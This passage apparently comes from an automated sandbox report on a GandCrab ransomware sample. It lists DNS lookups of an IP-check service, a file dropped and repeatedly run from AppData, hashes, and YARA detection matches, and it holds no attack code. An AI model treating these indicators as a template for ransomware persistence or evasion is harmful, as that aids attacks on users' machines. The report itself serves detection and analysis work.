Sep 1, 2022 00:07:52.513761044 CEST	192.168.2.3	8.8.8.8	0x6f58	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:08:04.046449900 CEST	192.168.2.3	8.8.8.8	0xd60e	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:08:09.926047087 CEST	192.168.2.3	8.8.8.8	0xb9a9	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:08:22.282254934 CEST	192.168.2.3	8.8.8.8	0xb7b	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:08:32.932132959 CEST	192.168.2.3	8.8.8.8	0x70c4	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:08:50.475862980 CEST	192.168.2.3	8.8.8.8	0x7a43	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:09:02.752767086 CEST	192.168.2.3	8.8.8.8	0x359e	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:09:21.074116945 CEST	192.168.2.3	8.8.8.8	0x6853	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:09:35.271372080 CEST	192.168.2.3	8.8.8.8	0x642b	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:09:47.508217096 CEST	192.168.2.3	8.8.8.8	0xe80f	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:10:05.653143883 CEST	192.168.2.3	8.8.8.8	0x2436	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:10:13.795104980 CEST	192.168.2.3	8.8.8.8	0xb939	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:10:21.883244991 CEST	192.168.2.3	8.8.8.8	0x1cb7	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:10:29.572328091 CEST	192.168.2.3	8.8.8.8	0x5c0c	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Sep 1, 2022 00:10:38.119400978 CEST	192.168.2.3	8.8.8.8	0xefbc	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: mPNVrHIpyt.exePID: 3592, Parent PID: 3508

General

Target ID:	0
Start time:	00:07:26
Start date:	01/09/2022
Path:	C:\Users\user\Desktop\mPNVrHIpyt.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\mPNVrHIpyt.exe"
Imagebase:	0xf690000
File size:	71680 bytes
MD5 hash:	CC7AE6E4C86F605AAB66FBD04EEF7997
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000000.264971762.000000000F69A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000000.00000003.280650626.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 1276, Parent PID: 3452

General

Target ID:	11
Start time:	00:07:42
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0x7ff651c80000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000000.302743243.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000002.320296152.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000B.00000003.319280593.0000000003940000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000B.00000002.320303150.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe, Author: ReversingLabs
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 1920, Parent PID: 3452

General

Target ID:	12
Start time:	00:07:52
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000C.00000003.343975450.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000002.344609197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000C.00000002.344617824.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000C.00000000.321133700.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 4616, Parent PID: 3452

General

Target ID:	13
Start time:	00:08:00
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000D.00000002.357323149.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000D.00000002.357333770.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000D.00000003.356575582.0000000003270000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000D.00000000.343145557.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 6136, Parent PID: 3452

General

Target ID:	15
Start time:	00:08:12
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000000.363985954.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000002.385026266.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000000F.00000003.383072637.0000000002FA0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000000F.00000002.385057695.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 1356, Parent PID: 3452

General

Target ID:	18
Start time:	00:08:21
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000012.00000002.407272016.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000012.00000000.383675616.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000012.00000003.405995868.0000000003A80000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000012.00000002.407240939.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 2996, Parent PID: 3452

General

Target ID:	20
Start time:	00:08:29
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000014.00000000.401188568.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000014.00000002.405226267.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 6016, Parent PID: 3452

General

Target ID:	22
Start time:	00:08:38
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000016.00000002.444732494.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000016.00000003.443479124.0000000003640000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000000.422070871.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000016.00000002.444710871.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 5520, Parent PID: 3452

General

Target ID:	25
Start time:	00:08:52
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 00000019.00000002.471339306.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000002.471324197.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000000.449352573.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 00000019.00000003.469796043.0000000003A00000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 2228, Parent PID: 3452

General

Target ID:	27
Start time:	00:09:00
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000000.467592821.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001B.00000002.470832696.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 6128, Parent PID: 3452

General

Target ID:	28
Start time:	00:09:09
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000000.485070318.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001C.00000002.511353636.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001C.00000003.509057598.00000000038A0000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001C.00000002.511336369.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 5752, Parent PID: 3452

General

Target ID:	30
Start time:	00:09:18
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000000.505234483.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001E.00000002.508822992.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 2156, Parent PID: 3452

General

Target ID:	31
Start time:	00:09:27
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001F.00000000.523518226.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: ReflectiveLoader, Description: Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended, Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: SUSP_RANSOMWARE_Indicator_Jul20, Description: Detects ransomware indicator, Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Author: Florian Roth Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_ReflectiveLoader, Description: detects Reflective DLL injection artifacts, Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen Rule: Gandcrab, Description: Gandcrab Payload, Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly Rule: Win32_Ransomware_GandCrab, Description: unknown, Source: 0000001F.00000003.539610642.0000000003B90000.00000004.00001000.00020000.00000000.sdmp, Author: ReversingLabs Rule: JoeSecurity_Gandcrab, Description: Yara detected Gandcrab, Source: 0000001F.00000002.547100256.000000000FBC2000.00000004.00000001.01000000.00000004.sdmp, Author: Joe Security Rule: JoeSecurity_ReflectiveLoader, Description: Yara detected ReflectiveLoader, Source: 0000001F.00000002.547067316.000000000FBBA000.00000002.00000001.01000000.00000004.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: wzltxa.exePID: 5248, Parent PID: 3452

General

Target ID:	33
Start time:	00:09:36
Start date:	01/09/2022
Path:	C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Microsoft\wzltxa.exe"
Imagebase:	0xfbb0000
File size:	71680 bytes
MD5 hash:	EAC223A7EC1CF2E33BE569DB14A87A63
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
